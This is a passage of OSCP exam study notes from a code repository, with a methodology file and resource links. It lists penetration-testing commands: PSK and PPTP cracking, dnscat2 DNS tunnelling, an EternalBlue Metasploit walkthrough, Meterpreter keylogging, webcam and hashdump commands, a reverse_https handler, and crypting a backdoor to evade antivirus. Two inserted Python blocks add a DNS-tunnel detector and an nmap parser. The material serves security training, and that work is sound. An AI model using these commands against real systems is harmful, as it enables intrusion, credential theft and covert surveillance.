2280 | psk-crack -b 5 --charset="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key
2281 | psk-crack -d /path/to/dictionary-file TARGET-IP-key`
2282 |
2283 | - PPTP Hacking
2284 |
2285 | - Identifying PPTP: it listens on TCP 1723
2286 | NMAP PPTP Fingerprint:
2287 |
2288 | `nmap -Pn -sV -p 1723 TARGET(S)`
2289 | PPTP Dictionary Attack
2290 |
2291 | `thc-pptp-bruter -u hansolo -W -w /usr/share/wordlists/nmap.lst`
2292 |
2293 | - Port Forwarding/Redirection
2294 |
2295 | - PuTTY Link tunnel - SSH Tunneling
2296 |
2297 | - Forward remote port to local address:
2298 |
2299 | `plink.exe -P 22 -l root -pw "1337" -R 445::445 `
2300 |
2301 | - SSH Pivoting
2302 |
2303 | - SSH pivoting from one network to another:
2304 |
2305 | `ssh -D :1010 -p 22 user@`
2306 |
2307 | - DNS Tunneling
2308 |
2309 | - dnscat2 supports “download” and “upload” commands for getting files (data and programs) to and from the target machine.
2310 |
2311 | - Attacking Machine Installation:
2312 |
2313 | `apt-get update
2314 | apt-get -y install ruby-dev git make g++
2315 | gem install bundler
2316 | git clone https://github.com/iagox86/dnscat2.git
2317 | cd dnscat2/server
2318 | bundle install`
2319 |
2320 | - Run dnscat2:
2321 |
2322 | `ruby ./dnscat2.rb
2323 | dnscat2> New session established: 1422
2324 | dnscat2> session -i 1422`
2325 |
2326 | - Target Machine:
2327 | https://downloads.skullsecurity.org/dnscat2/
2328 | https://github.com/lukebaggett/dnscat2-powershell/
2329 |
2330 | `dnscat --host `
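
The tunnelling notes above describe the attacker side of DNS tunnelling; the defender's counterpart is spotting it in query logs. The following is an added example (not part of dnscat2 or of the original notes) that scores DNS queries on the traits such tunnels leave behind: very long, high-entropy labels under one parent domain, data-carrying record types (TXT, NULL, CNAME, MX), and many such names from a single client. The sample log lines are constructed in BIND query-log style, and the thresholds (30-character labels, 3.5 bits/char, three hits) are assumptions to tune against your own baseline.

```python
"""Flag DNS traffic that looks like a covert channel (dnscat2-style
tunnelling): long, high-entropy labels under one parent domain, record types
that carry arbitrary data (TXT, NULL, CNAME, MX), many such names from one
client.  Added example for the DNS tunnelling notes above; it is not part of
dnscat2 or of the original page.  The thresholds and the BIND-style sample
log lines are assumptions constructed for the demo."""
import math
import re
from collections import defaultdict

# Constructed sample query-log lines (BIND "query:" log style).
SAMPLE_LOG = """\
client 10.0.0.12#41022: query: www.example.com IN A +
client 10.0.0.12#41023: query: mail.example.com IN MX +
client 10.0.0.12#41024: query: 9f2e6a1c0d5b7e3a48c1f9b2d6e0a7c3.tun.example.net IN TXT +
client 10.0.0.12#41025: query: 3c8b1d0f7a9e2c4b6d1f5a0e8c7b2d9f.tun.example.net IN TXT +
client 10.0.0.12#41026: query: a1b2c3d4e5f60718293a4b5c6d7e8f90.tun.example.net IN CNAME +
client 10.0.0.12#41027: query: 0d9c8b7a6f5e4d3c2b1a0f9e8d7c6b5a.tun.example.net IN MX +
client 10.0.0.33#53011: query: cdn.static.example.com IN A +
"""

QUERY_RE = re.compile(r"client (?P<client>[\d.]+)#\d+: query: (?P<qname>\S+) IN (?P<qtype>\w+)")

DATA_CARRYING_TYPES = ("TXT", "NULL", "CNAME", "MX")
LONG_LABEL = 30      # chars; assumed threshold
HIGH_ENTROPY = 3.5   # bits per char; random hex is ~4.0, English words ~2.5


def shannon_entropy(s):
    """Shannon entropy of the characters in s, in bits per character."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_name(qname, parent_labels=2):
    """'x.tun.example.net' -> ('x.tun', 'example.net')."""
    labels = qname.rstrip(".").split(".")
    return ".".join(labels[:-parent_labels]), ".".join(labels[-parent_labels:])


def score_query(qname, qtype):
    """Reasons a single query looks tunnel-like; an empty list means benign."""
    reasons = []
    longest = max(qname.rstrip(".").split("."), key=len)
    if len(longest) >= LONG_LABEL:
        reasons.append("long label (%d chars)" % len(longest))
    ent = shannon_entropy(longest)
    if ent >= HIGH_ENTROPY:
        reasons.append("high-entropy label (%.2f bits/char)" % ent)
    if qtype in DATA_CARRYING_TYPES:
        reasons.append("data-carrying record type %s" % qtype)
    return reasons


def find_tunnel_candidates(log_text, min_hits=3):
    """Group suspicious queries by (client, parent domain) and return the
    groups with at least min_hits queries.  A lone odd record type (a normal
    MX lookup, say) is not enough: two independent indicators are required."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = QUERY_RE.search(line)
        if not m:
            continue
        qname, qtype = m.group("qname"), m.group("qtype")
        if len(score_query(qname, qtype)) >= 2:
            _prefix, parent = split_name(qname)
            hits[(m.group("client"), parent)].append(qname)
    return {key: names for key, names in hits.items() if len(names) >= min_hits}


if __name__ == "__main__":
    for (client, parent), names in find_tunnel_candidates(SAMPLE_LOG).items():
        print("%s -> %s: %d suspicious queries" % (client, parent, len(names)))
```

Run against real resolver logs, the grouping by (client, parent domain) is what separates a tunnel from one-off noise: CDNs and anti-spam services also use long hashed labels, but they spread across many parents and rarely use TXT/CNAME/MX from one client in bulk, so keep a whitelist of known parents and tune `min_hits` to the volume you see.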
2331 |
2332 | The Metasploit Framework
2333 | ======================================================================================================================
2334 |
2335 | - See [*Metasploit Unleashed
2336 | Course*](https://www.offensive-security.com/metasploit-unleashed/)
2337 | in the Essentials
2338 |
2339 | - Search for exploits using Metasploit GitHub framework source code:
2340 | [*https://github.com/rapid7/metasploit-framework*](https://github.com/rapid7/metasploit-framework)
2341 | Translate them for use on OSCP LAB or EXAM.
2342 |
2343 | - Metasploit
2344 |
2345 | - Metasploit requires PostgreSQL
2346 |
2347 | `systemctl start postgresql`
2348 |
2349 | - To enable Postgresql on startup
2350 |
2351 | `systemctl enable postgresql`
2352 |
2353 | - MSF Syntax
2354 |
2355 | - Start metasploit
2356 |
2357 | `msfconsole `
2358 |
2359 | `msfconsole -q`
2360 |
2361 | - Show help for command
2362 |
2363 | `show -h`
2364 |
2365 | - Show Auxiliary modules
2366 |
2367 | `show auxiliary`
2368 |
2369 | - Use a module
2370 |
2371 | `use auxiliary/scanner/snmp/snmp_enum
2372 | use auxiliary/scanner/http/webdav_scanner
2373 | use auxiliary/scanner/smb/smb_version
2374 | use auxiliary/scanner/ftp/ftp_login
2375 | use exploit/windows/pop3/seattlelab_pass`
2376 |
2377 | - Show the basic information for a module
2378 |
2379 | `info`
2380 |
2381 | - Show the configuration parameters for a module
2382 |
2383 | `show options`
2384 |
2385 | - Set options for a module
2386 |
2387 | `set RHOSTS 192.168.1.1-254
2388 | set THREADS 10`
2389 |
2390 | - Run the module
2391 |
2392 | `run`
2393 |
2394 | - Execute an Exploit
2395 |
2396 | `exploit`
2397 |
2398 | - Search for a module
2399 |
2400 | `search type:auxiliary login`
2401 |
2402 | - Metasploit Database Access
2403 |
2404 | - Show all hosts discovered in the MSF database
2405 |
2406 | `hosts`
2407 |
2408 | - Scan for hosts and store them in the MSF database
2409 |
2410 | `db_nmap`
2411 |
2412 | - Search machines for specific ports in MSF database
2413 |
2414 | `services -p 443`
2415 |
2416 | - Leverage MSF database to scan SMB ports (auto-completed rhosts)
2417 |
2418 | `services -p 443 --rhosts`
2419 |
2420 | - Staged and Non-staged
2421 |
2422 | - Non-staged payload - is a payload that is sent in its entirety in one go
2423 |
2424 | - Staged - sent in two parts; used when there is not enough buffer space for the full payload or when antivirus needs to be bypassed
2425 |
2426 | - MS 17-010 - EternalBlue
2427 |
2428 | - You may find some boxes that are vulnerable to MS17-010 (AKA EternalBlue). Although not officially part of the intended course, this exploit can be leveraged to gain SYSTEM level access to a Windows box. I have never had much luck using the built-in Metasploit EternalBlue module. I found that the ElevenPaths version works much more reliably. Here are the instructions to install it, taken from the following YouTube video:
2429 | https://www.youtube.com/watch?v=4OHLor9VaRI
2430 |
2431 |
2432 | 1. First step is to configure Kali to work with 32-bit wine
2433 |
2434 | `dpkg --add-architecture i386 && apt-get update && apt-get install wine32
2435 | rm -r ~/.wine
2436 | wine cmd.exe
2437 | exit`
2438 |
2439 | 2. Download the exploit repository
2440 | https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
2441 |
2442 | 3. Move the exploit to /usr/share/metasploit-framework/modules/exploits/windows/smb
2443 |
2444 | 4. Start metasploit console
2445 |
2446 |
2447 | I found that using spoolsv.exe as the PROCESSINJECT yielded results on OSCP boxes.
2448 |
2449 |
2450 | `use exploit/windows/smb/eternalblue_doublepulsar
2451 | msf exploit(eternalblue_doublepulsar) > set RHOST 10.10.10.10
2452 | RHOST => 10.10.10.10
2453 | msf exploit(eternalblue_doublepulsar) > set PROCESSINJECT spoolsv.exe
2454 | PROCESSINJECT => spoolsv.exe
2455 | msf exploit(eternalblue_doublepulsar) > run`
2456 |
2457 |
2458 |
2459 | - Experimenting with Meterpreter
2460 |
2461 | - Get system information from Meterpreter Shell
2462 |
2463 | `sysinfo`
2464 |
2465 | - Get user id from Meterpreter Shell
2466 |
2467 | `getuid`
2468 |
2469 | - Search for a file
2470 |
2471 | `search -f *pass*.txt`
2472 |
2473 | - Upload a file
2474 |
2475 | `upload /usr/share/windows-binaries/nc.exe c:\\Users\\Offsec`
2476 |
2477 | - Download a file
2478 |
2479 | `download c:\\Windows\\system32\\calc.exe /tmp/calc.exe`
2480 |
2481 | - Invoke a command shell from Meterpreter Shell
2482 |
2483 | `shell`
2484 |
2485 | - Exit the meterpreter shell
2486 |
2487 | `exit`
2488 |
2489 | - Metasploit Exploit Multi Handler
2490 |
2491 | - multi/handler to accept an incoming reverse_https Meterpreter payload
2492 |
2493 | `use exploit/multi/handler
2495 | set PAYLOAD windows/meterpreter/reverse_https
2496 | set LHOST $ip
2497 | set LPORT 443
2498 | exploit
2499 | [*] Started HTTPS reverse handler on https://$ip:443/`
2500 |
2501 | - Building Your Own MSF Module
2502 |
2503 | - `mkdir -p ~/.msf4/modules/exploits/linux/misc
2504 | cd ~/.msf4/modules/exploits/linux/misc
2505 | cp /usr/share/metasploit-framework/modules/exploits/linux/misc/gld_postfix.rb ./crossfire.rb
2506 | nano crossfire.rb`
2509 |
2510 | - Post Exploitation with Metasploit - (available options depend on OS and Meterpreter capabilities)
2511 |
2512 | - `download` Download a file or directory
2513 | `upload` Upload a file or directory
2514 | `portfwd` Forward a local port to a remote service
2515 | `route` View and modify the routing table
2516 | `keyscan_start` Start capturing keystrokes
2517 | `keyscan_stop` Stop capturing keystrokes
2518 | `screenshot` Grab a screenshot of the interactive desktop
2519 | `record_mic` Record audio from the default microphone for X seconds
2520 | `webcam_snap` Take a snapshot from the specified webcam
2521 | `getsystem` Attempt to elevate your privilege to that of local system.
2522 | `hashdump` Dumps the contents of the SAM database
2523 |
2524 | - Meterpreter Post Exploitation Features
2525 |
2526 | - Create a Meterpreter background session
2527 |
2528 | `background`
2529 |
2530 | Bypassing Antivirus Software
2531 | ===========================================================================================================================
2532 |
2533 | - Crypting Known Malware with Software Protectors
2534 |
2535 | - One such open source crypter, called Hyperion
2536 |
2537 | `cp /usr/share/windows-binaries/Hyperion-1.0.zip .
2538 | unzip Hyperion-1.0.zip
2539 | cd Hyperion-1.0/
2540 | i686-w64-mingw32-g++ Src/Crypter/*.cpp -o hyperion.exe
2541 | cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libgcc_s_sjlj-1.dll .
2542 | cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libstdc++-6.dll .
2543 | wine hyperion.exe ../backdoor.exe ../crypted.exe`
2544 |
2545 |
2546 | OSCP Course Review
2547 | ================================================================================================================
2548 |
2549 | - Offensive Security’s PWB and OSCP — My Experience
2550 | [*http://www.securitysift.com/offsec-pwb-oscp/*](http://www.securitysift.com/offsec-pwb-oscp/)
2551 |
2552 | - OSCP Journey
2553 | [*https://scriptkidd1e.wordpress.com/oscp-journey/*](https://scriptkidd1e.wordpress.com/oscp-journey/)
2554 |
2555 | - Down with OSCP
2556 | [*http://ch3rn0byl.com/down-with-oscp-yea-you-know-me/*](http://ch3rn0byl.com/down-with-oscp-yea-you-know-me/)
2557 |
2558 | - Jolly Frogs - Tech Exams (Very thorough)
2559 |
2560 | [*http://www.techexams.net/forums/security-certifications/110760-oscp-jollyfrogs-tale.html*](http://www.techexams.net/forums/security-certifications/110760-oscp-jollyfrogs-tale.html)
2561 |
2562 | OSCP Inspired VMs and Walkthroughs
2563 | ================================================================================================================================
2564 |
2565 | - [*https://www.vulnhub.com/*](https://www.vulnhub.com/)
2566 | [*https://www.root-me.org/*](https://www.root-me.org/)
2567 |
2568 | - Walkthrough of Tr0ll-1 - inspired by the trolling found in the
2569 | OSCP exam
2570 | [*https://highon.coffee/blog/tr0ll-1-walkthrough/*](https://highon.coffee/blog/tr0ll-1-walkthrough/)
2571 | Another walk through for Tr0ll-1
2572 | [*https://null-byte.wonderhowto.com/how-to/use-nmap-7-discover-vulnerabilities-launch-dos-attacks-and-more-0168788/*](https://null-byte.wonderhowto.com/how-to/use-nmap-7-discover-vulnerabilities-launch-dos-attacks-and-more-0168788/)
2573 | Taming the troll - walkthrough
2574 | [*https://leonjza.github.io/blog/2014/08/15/taming-the-troll/*](https://leonjza.github.io/blog/2014/08/15/taming-the-troll/)
2575 | Troll download on Vuln Hub
2576 | [*https://www.vulnhub.com/entry/tr0ll-1,100/*](https://www.vulnhub.com/entry/tr0ll-1,100/)
2577 |
2578 | - Sickos - Walkthrough:
2579 | [*https://highon.coffee/blog/sickos-1-walkthrough/*](https://highon.coffee/blog/sickos-1-walkthrough/)
2580 | Sickos - Inspired by Labs in OSCP
2581 | [*https://www.vulnhub.com/series/sickos,70/*](https://www.vulnhub.com/series/sickos,70/)
2582 |
2583 | - Lord of the Root Walk Through
2584 | [*https://highon.coffee/blog/lord-of-the-root-walkthrough/*](https://highon.coffee/blog/lord-of-the-root-walkthrough/)
2585 | Lord Of The Root: 1.0.1 - Inspired by OSCP
2586 | [*https://www.vulnhub.com/series/lord-of-the-root,67/*](https://www.vulnhub.com/series/lord-of-the-root,67/)
2587 |
2588 | - Tr0ll-2 Walk Through
2589 | [*https://leonjza.github.io/blog/2014/10/10/another-troll-tamed-solving-troll-2/*](https://leonjza.github.io/blog/2014/10/10/another-troll-tamed-solving-troll-2/)
2590 | Tr0ll-2
2591 | [*https://www.vulnhub.com/entry/tr0ll-2,107/*](https://www.vulnhub.com/entry/tr0ll-2,107/)
2592 |
2593 | Cheat Sheets
2594 | ==========================================================================================================
2595 |
2596 | - Penetration Tools Cheat Sheet
2597 | [*https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/*](https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/)
2598 |
2599 | - Pen Testing Bookmarks
2600 | [*https://github.com/kurobeats/pentest-bookmarks/blob/master/BookmarksList.md*](https://github.com/kurobeats/pentest-bookmarks/blob/master/BookmarksList.md)
2601 |
2602 | - OSCP Cheatsheets
2603 | [*https://github.com/slyth11907/Cheatsheets*](https://github.com/slyth11907/Cheatsheets)
2604 |
2605 | - CEH Cheatsheet
2606 | [*https://scadahacker.com/library/Documents/Cheat\_Sheets/Hacking%20-%20CEH%20Cheat%20Sheet%20Exercises.pdf*](https://scadahacker.com/library/Documents/Cheat_Sheets/Hacking%20-%20CEH%20Cheat%20Sheet%20Exercises.pdf)
2607 |
2608 | - Net Bios Scan Cheat Sheet
2609 | [*https://highon.coffee/blog/nbtscan-cheat-sheet/*](https://highon.coffee/blog/nbtscan-cheat-sheet/)
2610 |
2611 | - Reverse Shell Cheat Sheet
2612 | [*https://highon.coffee/blog/reverse-shell-cheat-sheet/*](https://highon.coffee/blog/reverse-shell-cheat-sheet/)
2613 |
2614 | - NMap Cheat Sheet
2615 | [*https://highon.coffee/blog/nmap-cheat-sheet/*](https://highon.coffee/blog/nmap-cheat-sheet/)
2616 |
2617 | - Linux Commands Cheat Sheet
2618 | [*https://highon.coffee/blog/linux-commands-cheat-sheet/*](https://highon.coffee/blog/linux-commands-cheat-sheet/)
2619 |
2620 | - Security Hardening CentOS 7
2621 | [*https://highon.coffee/blog/security-harden-centos-7/*](https://highon.coffee/blog/security-harden-centos-7/)
2622 |
2623 | - MetaSploit Cheatsheet
2624 | [*https://www.sans.org/security-resources/sec560/misc\_tools\_sheet\_v1.pdf*](https://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf)
2625 |
2626 | - Google Hacking Database:
2627 | [*https://www.exploit-db.com/google-hacking-database/*](https://www.exploit-db.com/google-hacking-database/)
2628 |
2629 | - Windows Assembly Language Mega Primer
2630 | [*http://www.securitytube.net/groups?operation=view&groupId=6*](http://www.securitytube.net/groups?operation=view&groupId=6)
2631 |
2632 | - Linux Assembly Language Mega Primer
2633 | [*http://www.securitytube.net/groups?operation=view&groupId=5*](http://www.securitytube.net/groups?operation=view&groupId=5)
2634 |
2638 | - A bit dated but most is still relevant
2639 |
2640 | [*http://hackingandsecurity.blogspot.com/2016/04/oscp-related-notes.html*](http://hackingandsecurity.blogspot.com/2016/04/oscp-related-notes.html)
2641 |
2642 | - NetCat
2643 |
2644 | - [*http://www.sans.org/security-resources/sec560/netcat\_cheat\_sheet\_v1.pdf*](http://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf)
2645 |
2646 | - [*http://www.secguru.com/files/cheatsheet/nessusNMAPcheatSheet.pdf*](http://www.secguru.com/files/cheatsheet/nessusNMAPcheatSheet.pdf)
2647 |
2648 | - [*http://sbdtools.googlecode.com/files/hping3\_cheatsheet\_v1.0-ENG.pdf*](http://sbdtools.googlecode.com/files/hping3_cheatsheet_v1.0-ENG.pdf)
2649 |
2650 | - [*http://sbdtools.googlecode.com/files/Nmap5%20cheatsheet%20eng%20v1.pdf*](http://sbdtools.googlecode.com/files/Nmap5%20cheatsheet%20eng%20v1.pdf)
2651 |
2652 | - [*http://www.sans.org/security-resources/sec560/misc\_tools\_sheet\_v1.pdf*](http://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf)
2653 |
2654 | - [*http://rmccurdy.com/scripts/Metasploit%20meterpreter%20cheat%20sheet%20reference.html*](http://rmccurdy.com/scripts/Metasploit%20meterpreter%20cheat%20sheet%20reference.html)
2655 |
2656 | - [*http://h.ackack.net/cheat-sheets/netcat*](http://h.ackack.net/cheat-sheets/netcat)
2657 |
2658 | Essentials
2659 | ========================================================================================================
2660 |
2661 | - Exploit-db
2662 | [*https://www.exploit-db.com/*](https://www.exploit-db.com/)
2663 |
2664 | - SecurityFocus - Vulnerability database
2665 | [*http://www.securityfocus.com/*](http://www.securityfocus.com/)
2666 |
2667 | - Vuln Hub - Vulnerable by design
2668 | [*https://www.vulnhub.com/*](https://www.vulnhub.com/)
2669 |
2670 | - Exploit Exercises
2671 | [*https://exploit-exercises.com/*](https://exploit-exercises.com/)
2672 |
2673 | - SecLists - collection of multiple types of lists used during
2674 | security assessments. List types include usernames, passwords, URLs,
2675 | sensitive data grep strings, fuzzing payloads
2676 | [*https://github.com/danielmiessler/SecLists*](https://github.com/danielmiessler/SecLists)
2677 |
2678 | - Security Tube
2679 | [*http://www.securitytube.net/*](http://www.securitytube.net/)
2680 |
2681 | - Metasploit Unleashed - free course on how to use Metasploit
2682 | [*https://www.offensive-security.com/metasploit-unleashed/*](https://www.offensive-security.com/metasploit-unleashed/)
2683 |
2684 | - 0Day Security Enumeration Guide
2685 | [*http://www.0daysecurity.com/penetration-testing/enumeration.html*](http://www.0daysecurity.com/penetration-testing/enumeration.html)
2686 |
2687 | - Github IO Book - Pen Testing Methodology
2688 | [*https://monkeysm8.gitbooks.io/pentesting-methodology/*](https://monkeysm8.gitbooks.io/pentesting-methodology/)
2689 |
2690 | Windows Privilege Escalation
2691 | ========================================================================================================
2692 |
2693 | - Fuzzy Security
2694 | [*http://www.fuzzysecurity.com/tutorials/16.html*](http://www.fuzzysecurity.com/tutorials/16.html)
2695 |
2696 | - accesschk.exe
2697 | https://technet.microsoft.com/en-us/sysinternals/bb664922
2698 |
2699 | - Windows Priv Escalation For Pen Testers
2700 | https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
2701 |
2702 | - Elevating Privileges to Admin and Further
2703 | https://hackmag.com/security/elevating-privileges-to-administrative-and-further/
2704 |
2705 | - Transfer files to windows machines
2706 | https://blog.netspi.com/15-ways-to-download-a-file/
2707 |
--------------------------------------------------------------------------------
/InfoSec-Learning-Materials/Process.md:
--------------------------------------------------------------------------------
1 | # OSCP Methodology
2 |
3 | ## Vaguely Important Things (Higher Abstraction PoV)
4 | - Try Harder = Enumerate Harder
5 | - Nmap -> Gobuster / Wfuzz -> Nikto -> Searchsploit
6 | - [Useful OSCP Notes](https://github.com/dostoevskylabs/dostoevsky-pentest-notes)
7 |
8 | ## Note taking / Reporting
9 |
10 | [OffSec's Reporting Template](https://www.offensive-security.com/pwk-online/PWKv1-REPORT.doc)
11 |
12 | - Read up on what specific requirements there are for extra points
13 | - Over the next week of study, refine note-taking & screenshotting to make life easier
14 | - Use OneNote, seems to be recommended a bunch
15 |
16 |
17 | ## Things to do that will be *very* useful
18 | - Compiling exploits for various operating systems so I don't need to later down the line... github might be best here for finding & checking these.
19 | - Making the most of the labs whilst they are available. Try to get through as much as possible, because it's the only limited resource.
20 | - Look at Penetration Testing book for good methodology
21 |
22 |
23 |
24 | ## Initial Enumeration
25 |
26 | ### Port scanning:
27 | nmap -F $TARGET
28 |
29 | (Check web services/anything obvious)
30 |
31 | nmap -p- $TARGET -oA fullPortSweep
32 |
33 | nmap -p $PORTS -A $TARGET -oA scriptsVersionsOS ($PORTS: the open ports found by the full port sweep)
34 |
35 | nmap -p $PORTS --script=vuln $TARGET -oA vulnScripts
36 |
37 | nmap -p- -sU $TARGET -oA UDPSweep (full UDP scan)
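
The step from the full port sweep to the targeted `-p` scans needs the list of open ports out of the sweep's output. The following is an added example (not part of these notes or of nmap) that parses nmap's grepable format, the `.gnmap` file that `-oA` writes, and builds the `-p` argument from the open ports it finds. The scan output embedded below is constructed for the demo, not a real scan.

```python
"""Parse nmap grepable output (-oG, or the .gnmap file written by -oA) and
collect the open ports per host, so the full-port sweep above can feed the
targeted -p scans that follow it.  Added example; not part of the original
notes or of nmap.  The scan output below is constructed, not a real scan."""

# Constructed sample .gnmap content in the format nmap writes with -oG/-oA.
SAMPLE_GNMAP = """\
# Nmap 7.70 scan initiated Mon Jan  1 12:00:00 2018 as: nmap -p- -oA fullPortSweep 10.0.0.5
Host: 10.0.0.5 ()\tStatus: Up
Host: 10.0.0.5 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.4 (protocol 2.0)/, 80/open/tcp//http//Apache httpd 2.4.6/, 111/closed/tcp//rpcbind///, 3306/filtered/tcp//mysql///\tIgnored State: closed (65531)
# Nmap done at Mon Jan  1 12:05:00 2018 -- 1 IP address (1 host up) scanned in 300.00 seconds
"""


def parse_gnmap(text):
    """Return {host: [(port, proto, service, version), ...]} for open ports only.

    Each Ports: entry has the form port/state/proto/owner/service/rpcinfo/version/
    (nmap's grepable format substitutes '|' for any '/' inside the version
    string, so splitting on '/' is safe)."""
    results = {}
    for line in text.splitlines():
        if not line.startswith("Host:") or "\tPorts:" not in line:
            continue  # comment lines and "Status: Up" lines carry no ports
        fields = line.split("\t")
        host = fields[0].split()[1]
        ports_field = next(f for f in fields if f.startswith("Ports:"))
        open_ports = results.setdefault(host, [])
        for entry in ports_field[len("Ports:"):].strip().split(", "):
            parts = entry.split("/")
            if len(parts) < 7:
                continue
            port, state, proto, _owner, service, _rpc, version = parts[:7]
            if state == "open":
                open_ports.append((int(port), proto, service, version))
    return results


def port_spec(open_ports):
    """Comma-separated port list for nmap -p, e.g. '22,80'."""
    return ",".join(str(p[0]) for p in sorted(open_ports))


if __name__ == "__main__":
    for host, ports in parse_gnmap(SAMPLE_GNMAP).items():
        print(host, "open:", port_spec(ports))
        for port, proto, service, version in ports:
            print("  %d/%s %s %s" % (port, proto, service, version))
```

With the real file, `parse_gnmap(open("fullPortSweep.gnmap").read())` gives the per-host list, and `port_spec()` produces the value for the `-p` option of the version and script scans above; only ports in state `open` are kept, so `closed` and `filtered` entries never pad the follow-up scan.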
38 |
39 |
--------------------------------------------------------------------------------
/InfoSec-Learning-Materials/README.md:
--------------------------------------------------------------------------------
1 | # Infosec Learning Materials
2 |
3 | Resource for developing infosec skills for upcoming OSCP exam
4 |
5 | ## OSCP Rules & Documents
6 |
7 | [Exam Guide](https://support.offensive-security.com/#!oscp-exam-guide.md)
8 |
9 | ## Practice
10 |
11 | [Exploit Exercises](https://exploit-exercises.com/)
12 |
13 | [OverTheWire - Wargames](https://overthewire.org/wargames/)
14 |
15 | [Hack This Site](https://www.hackthissite.org/)
16 |
17 | [Flare-On](http://www.flare-on.com/)
18 |
19 | [Reverse Engineering Challenges](https://challenges.re/)
20 |
21 | [CTF Learn](https://ctflearn.com/)
22 |
23 | [Mystery Twister - Crypto Challenges](https://www.mysterytwisterc3.org/en/)
24 |
25 | ## Buffer Overflows
26 |
27 | [Buffer Overflow Practice](https://www.vortex.id.au/2017/05/pwkoscp-stack-buffer-overflow-practice/)
28 |
29 | [Fuzzy Security - Windows Exploit Development](http://www.fuzzysecurity.com/tutorials.html)
30 |
31 | [dostackbufferoverflowgood - easy to read](https://github.com/justinsteven/dostackbufferoverflowgood)
32 |
33 | [Exploit Exercises](https://exploit-exercises.com/)
34 |
35 | [Corelan's exploit writing tutorial](https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/)
36 |
37 | [Live Overflow's Binary Hacking Videos](https://www.youtube.com/watch?v=iyAyN3GFM7A&list=PLhixgUqwRTjxglIswKp9mpkfPNfHkzyeN)
38 |
39 | [Introduction to 32-bit Windows Buffer Overflows](https://www.veteransec.com/blog/introduction-to-32-bit-windows-buffer-overflows)
40 |
41 | [Getting Started with x86 Linux Buffer Overflows](https://scriptdotsh.com/index.php/2018/05/14/getting-started-with-linux-buffer-overflows-part-1-introduction/)
42 |
43 | ## Binary Exploitation
44 |
45 | [Binary Exploitation ELI5](https://medium.com/@danielabloom/binary-exploitation-eli5-part-1-9bc23855a3d8)
46 |
47 | [Exploit Development Roadmap](https://www.reddit.com/r/ExploitDev/comments/7zdrzc/exploit_development_learning_roadmap/)
48 |
49 | ## General OSCP Guides/Resources
50 |
51 | [Real Useful OSCP Journey](https://infosecuritygeek.com/my-oscp-journey/)
52 |
53 | [Tulpa PWK Prep](https://tulpa-security.com/2016/09/19/prep-guide-for-offsecs-pwk/)
54 |
55 | [Tulpa PWK Prep PDF](https://tulpasecurity.files.wordpress.com/2016/09/tulpa-pwk-prep-guide1.pdf)
56 |
57 | [Abatchy's Guide (apparently pretty good!)](https://www.abatchy.com/2017/03/how-to-prepare-for-pwkoscp-noob.html)
58 |
59 | [Real good guide with many an info](https://www.securitysift.com/offsec-pwb-oscp/)
60 |
61 | ## Infosec News / Publications
62 |
63 | [Security Affairs](http://securityaffairs.co/wordpress/)
64 |
65 | [The Register](https://www.theregister.co.uk/security/)
66 |
67 | [Risky Biz](https://risky.biz/)
68 |
69 | [Vectra](https://blog.vectra.ai/blog)
70 |
71 | ## Infosec Blogs
72 |
73 | [Nii Consulting](https://niiconsulting.com/checkmate/)
74 |
75 | [Guido Vranken](https://guidovranken.com)
76 |
77 | [SecJuice](https://medium.com/secjuice/)
78 |
79 | ## OSCP Reviews/Writeups
80 |
81 | ~~[Process Focused Review](https://occultsec.com/2018/04/27/the-oscp-a-process-focused-review/)~~
82 |
83 | ~~[Full marks in 90 days](https://coffeegist.com/security/my-oscp-experience/)~~
84 |
85 | [Zero to OSCP in 292 days (still somewhat relevant)](https://blog.mallardlabs.com/zero-to-oscp-in-292-days-or-how-i-accidentally-the-whole-thing-part-2/)
86 |
87 | [31-Day OSCP - with some useful info](https://scriptdotsh.com/index.php/2018/04/17/31-days-of-oscp-experience/)
88 |
89 | ## Fuzzing
90 |
91 | [Fuzzing Adobe Reader](https://kciredor.com/fuzzing-adobe-reader-for-exploitable-vulns-fun-not-profit.html)
92 |
93 | ## Reverse Engineering
94 |
95 | [Reverse Engineering x64 for Beginners](http://niiconsulting.com/checkmate/2018/04/reverse-engineering-x64-for-beginners-linux/)
96 |
97 | [Backdoor - Reverse Engineering CTFs](https://backdoor.sdslabs.co/)
98 |
99 | [Begin Reverse Engineering: workshop](https://www.begin.re/)
100 |
101 | ## Pivoting
102 |
103 | [The Red Teamer's Guide to Pivoting](https://artkond.com/2017/03/23/pivoting-guide/)
104 |
105 | ## Github Discovered OSCP Tools/Resources
106 |
107 | [Lots of OSCP Materials](https://gist.github.com/natesubra/5117959c660296e12d3ac5df491da395)
108 |
109 | [Collection of things made during OSCP journey](https://github.com/ihack4falafel/OSCP)
110 |
111 | [Notes from Study Plan](https://github.com/ferreirasc/oscp)
112 |
113 | [Resource List - not overly thorough](https://github.com/secman-pl/oscp)
114 |
115 | [Personal Notes for OSCP & Course](https://github.com/generaldespair/OSCP)
116 |
117 | [Buffer Overflow Practice](https://github.com/mikaelkall/vuln)
118 |
119 | [OSCP Cheat Sheet](https://github.com/mikaelkall/OSCP-cheat-sheet)
120 |
121 | [Bunch of interesting 1-liners and notes](https://github.com/gajos112/OSCP)
122 |
123 | [How to teach yourself infosec](https://github.com/thngkaiyuan/how-to-self-learn-infosec)
124 |
125 | ## Non-Preinstalled Kali Tools
126 |
127 | [Doubletap - loud/fast scanner](https://github.com/benrau87/doubletap)
128 |
129 | [Reconnoitre - recon for OSCP](https://github.com/codingo/Reconnoitre)
130 |
131 | [Pandora's Box - bunch of tools](https://github.com/paranoidninja/Pandoras-Box)
132 |
